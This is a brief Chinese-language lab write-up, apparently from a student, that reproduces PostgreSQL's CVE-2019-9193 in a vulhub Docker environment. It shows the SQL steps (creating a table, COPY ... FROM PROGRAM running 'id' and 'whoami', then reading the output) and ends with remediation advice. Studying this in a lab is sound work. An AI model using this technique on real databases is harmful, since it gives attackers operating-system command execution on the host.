漏洞概述

        PostgreSQL是一个功能强大对象关系数据库管理系统(ORDBMS)。由于9.3增加一个“COPY TO/FROM PROGRAM”功能。这个功能就是允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令。

影响版本

9.3-11.2

环境搭建

1. 本次漏洞环境使用vulhub中的docker搭建,vulhub下载地址:

GitHub - vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

2.下载完成后使用xftp传入安装有docker和环docker-compose境的虚拟机中解压并启动环境

cd vulhub-master/postgres/CVE-2019-9193

docker-compose up -d

3.使用docker ps查看是否启动成功

(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现-LMLPHP

4.通过获取ip和映射的端口5432来连接数据库。

启动成功后使用navicat连接数据库,数据库初始账号密码为postgres/

postgres。

(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现-LMLPHP

漏洞复现

1.执行删除你想用来保存命令输出但是可能存在的表,这一步可有可无

DROP TABLE IF EXISTS cmd_exec

2.创建用来保存命令输出的表:

CREATE TABLE cmd_exec(cmd_output text);

(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现-LMLPHP

3.通过 “COPY FROM PROGRAM”执行系统命令

COPY cmd_exec FROM PROGRAM 'id'

(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现-LMLPHP

4.将结果显示出来

SELECT * FROM cmd_exec

(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现-LMLPHP

5.执行其他命令

whoami

(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现-LMLPHP

SELECT * FROM cmd_exec

(CVE-2019-9193)PostgreSQL 高权限命令执行漏洞的复现-LMLPHP

修复建议

1.建议升级至最新版本

2.控制数据库权限禁止普通用户执行命令

此漏洞是根据老师上课讲的知识以及网上的资料将漏洞复现出来,步骤简略,请各位见谅。

12-24 09:56